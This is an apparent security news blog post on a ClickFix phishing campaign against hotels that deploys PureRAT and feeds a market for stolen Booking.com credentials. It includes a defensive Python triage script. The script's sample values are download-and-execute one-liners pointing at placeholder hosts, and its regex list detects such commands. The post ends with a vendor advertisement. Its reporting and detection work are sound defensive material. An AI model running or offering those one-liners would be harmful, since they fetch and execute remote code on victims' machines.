Large-Scale ClickFix Phishing Attacks Use PureRAT Malware to Target Hotel Systems
A large-scale phishing campaign targeting the hospitality sector has caught the attention of cybersecurity researchers. It lures hotel managers to ClickFix-style websites and uses malware such as PureRAT to steal their login credentials.
“The attacker’s modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments,” Sekoia stated. “This campaign leverages spear-phishing emails that impersonate Booking.com to redirect victims to malicious websites, employing the ClickFix social engineering tactic to deploy PureRAT.”

The campaign’s ultimate goal is to harvest credentials from compromised systems that give the threat actors unauthorized access to booking platforms such as Booking.com or Expedia. These credentials are then either sold on cybercrime forums or used to send fraudulent emails to hotel guests.
The activity was still ongoing as of early October 2025 and is assessed to have been active since at least April 2025. It is one of several efforts observed targeting the hospitality sector, including a series of attacks that Microsoft disclosed earlier in March.
In the most recent wave examined by the French cybersecurity firm, emails are sent from a compromised account to a number of hotels in different countries. Recipients are tricked into clicking bogus links that lead to a ClickFix page presenting a purported reCAPTCHA challenge to “ensure the security of your connection.”
“Upon visiting, the URL redirects users to a web page hosting a JavaScript with an asynchronous function that, after a brief delay, checks whether the page was displayed inside an iframe,” Sekoia said. “The objective is to redirect the user to the same URL but over HTTP.”
The chain ends with the victim copying and running a malicious PowerShell script that collects system information and downloads a ZIP archive containing an executable; that executable ultimately sets up persistence and loads PureRAT (also known as zgRAT) via DLL side-loading.
The modular trojan supports remote access, mouse and keyboard control, webcam and microphone capture, keylogging, file upload and download, traffic proxying, data exfiltration, and remote execution of commands or binaries. It also creates a Run registry key to persist on the host and is protected with .NET Reactor to hinder reverse engineering.
The threat actors have also been found contacting hotel guests by email or WhatsApp with valid reservation details, asking them to click a link and confirm their bank card information as part of a “verification” step supposedly required to keep the booking from being cancelled.
Guests who click the link land on a fraudulent page that imitates Booking.com or Expedia and is designed to harvest their credit card details.
Assessments indicate that the threat actors behind the scheme procure information about Booking.com administrators from illicit sites such as LolzTeam, in some cases offering payment as a share of the profits. That information is then used to social engineer the administrators into installing a remote access trojan (RAT) or infostealer on their systems. Traffers, specialists dedicated to malware distribution, are recruited to handle this work.
“Booking.com extranet accounts play a crucial role in fraudulent schemes targeting the hospitality industry,” Sekoia stated. “Consequently, data harvested from these accounts has become a lucrative commodity, regularly offered for sale in illicit marketplaces.”

“Attackers trade these accounts as authentication cookies or login/password pairs extracted from infostealer logs, given that this harvested data typically originates from malware compromise on hotel administrators’ systems.”
The company said it observed a threat actor called “moderator_booking” advertising a Booking log purchase service for logs related to Booking.com, Expedia, Airbnb, and Agoda, as well as a Telegram bot that buys Booking.com logs. The logs are said to be manually reviewed within 24 to 48 hours.
Review is typically done with log checker tools, sold on cybercrime forums for as little as $40, which validate the compromised accounts through proxies to confirm that the harvested credentials are still valid.
“The proliferation of cybercrime services supporting each step of the Booking.com attack chain reflects a professionalization of this fraud model,” Sekoia stated. “By adopting the ‘as-a-service’ model, cybercriminals lower entry barriers and maximise profits.”
Push Security, meanwhile, disclosed an update to the ClickFix social engineering technique that adds an embedded video, a countdown timer, and a counter of “users verified in the last hour,” along with step-by-step instructions, to boost perceived authenticity and push the user through the check without thinking it over.
Another notable change is that the page adapts its instructions to the victim’s operating system, asking them to open the Windows Run dialog or the macOS Terminal app depending on the device they are visiting from. The pages also increasingly copy the malicious command to the user’s clipboard automatically, a technique known as clipboard hijacking.
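On Windows, the Run dialog described above leaves a trace: Explorer records every command typed into it under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, with a trailing “\1” appended to each value. The following script is an added example (not code from Sekoia, Push Security, or this article) that triages such values, or equivalent process command lines, against heuristics for the PowerShell one-liners that ClickFix lures ask victims to paste. The sample values, the indicator list, the weights and the threshold are all assumptions made for illustration and should be tuned against your own telemetry; the “I am not a robot” comment indicator reflects lure text that many ClickFix commands carry, not a pattern this article attributes to the campaign.

```python
import re
from typing import List, Tuple

# Constructed sample values (not artefacts from the campaign), in the form Explorer
# stores them under ...\Explorer\RunMRU: the typed command plus a trailing "\1".
SAMPLE_RUNMRU = [
    r"notepad\1",
    r'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/v)" # I am not a robot - reCAPTCHA Verification ID: 7421\1',
    r"mshta https://example.invalid/check.hta\1",
    r"cmd /c curl -s https://example.invalid/x.zip -o %TEMP%\x.zip && tar -xf %TEMP%\x.zip -C %TEMP%\1",
    r"\\fileserver\share\1",
    r"powershell -Command Get-Process\1",
]

# Weighted heuristics (assumed values): each names one trait common to ClickFix
# one-liners. A command is flagged when the sum of matched weights reaches THRESHOLD.
INDICATORS: List[Tuple[str, int, "re.Pattern[str]"]] = [
    ("lolbin_launcher",     1, re.compile(r"^(?:powershell|pwsh|mshta|cmd|curl|wscript|cscript)\b", re.I)),
    ("hidden_window",       2, re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("exec_policy_bypass",  2, re.compile(r"-e(?:xecutionpolicy|p)?\s+bypass\b", re.I)),
    ("exec_from_memory",    3, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("remote_fetch",        2, re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|curl|wget|certutil)\b|https?://", re.I)),
    ("encoded_command",     2, re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("mshta_remote",        3, re.compile(r"\bmshta\b.*https?://", re.I)),
    ("lure_comment",        3, re.compile(r"#.*(?:not a robot|recaptcha|verification|cloudflare)", re.I)),
    ("archive_drop",        2, re.compile(r"\.zip\b.*\b(?:tar|expand-archive)\b", re.I)),
]
THRESHOLD = 5  # assumed cut-off


def strip_mru_suffix(value: str) -> str:
    """Remove the '\\1' marker Explorer appends to every RunMRU value."""
    return value[:-2] if value.endswith("\\1") else value


def score_command(cmd: str) -> Tuple[int, List[str]]:
    """Return (total weight, names of matched indicators) for one command."""
    cmd = strip_mru_suffix(cmd).strip()
    hits = [(name, weight) for name, weight, rx in INDICATORS if rx.search(cmd)]
    return sum(weight for _, weight in hits), [name for name, _ in hits]


def is_clickfix(cmd: str) -> bool:
    """True when the command looks like a pasted ClickFix one-liner."""
    return score_command(cmd)[0] >= THRESHOLD


def triage(values: List[str]) -> List[Tuple[str, int, List[str]]]:
    """Return (command, score, indicators) for every value that crosses THRESHOLD."""
    return [(strip_mru_suffix(v), *score_command(v)) for v in values if is_clickfix(v)]


if __name__ == "__main__":
    for cmd, score, names in triage(SAMPLE_RUNMRU):
        print(f"[{score:>2}] {cmd}\n      {', '.join(names)}")
```

The same regexes apply unchanged to process-creation telemetry (for example Sysmon Event ID 1 command lines whose parent is explorer.exe), which is where the pasted command shows up on hosts that clear RunMRU. Weighting rather than a single “powershell from the Run dialog” rule keeps benign administrative use such as the `Get-Process` sample below the threshold while still catching mshta- and curl-based variants that never invoke PowerShell.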
“ClickFix pages are becoming increasingly sophisticated, making it more likely that victims will fall for the social engineering,” Push Security said. “ClickFix payloads are becoming more varied and are finding new ways to evade security controls.”
Find out whether your organization’s employees can be phished using the varied techniques cybercriminals use today.
Any workforce is vulnerable to phishing, and in some cases it takes only a single phishing email. Knowing precisely what security risk your staff poses and how your users’ accounts could be compromised is crucial.
Here’s how Craw Security’s Phishing Simulation Services work:
- A credential capture mode that tricks users into submitting sensitive information.
- A large set of templates that mimic MFA/2FA prompts, including time-based and authenticator-app code flows.
- A multi-step MFA interface that looks legitimate to the targets.
- Adaptive MFA challenge scenarios, such as geo-location, device fingerprinting, or time-of-day anomalies, to deliver targeted training to users.
To learn more about the Phishing Simulation Services offered by Craw Security, visit the official Craw Security website, or call the hotline at +91-9513805401 and say the magic word, “Phishing,” to our representatives.
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.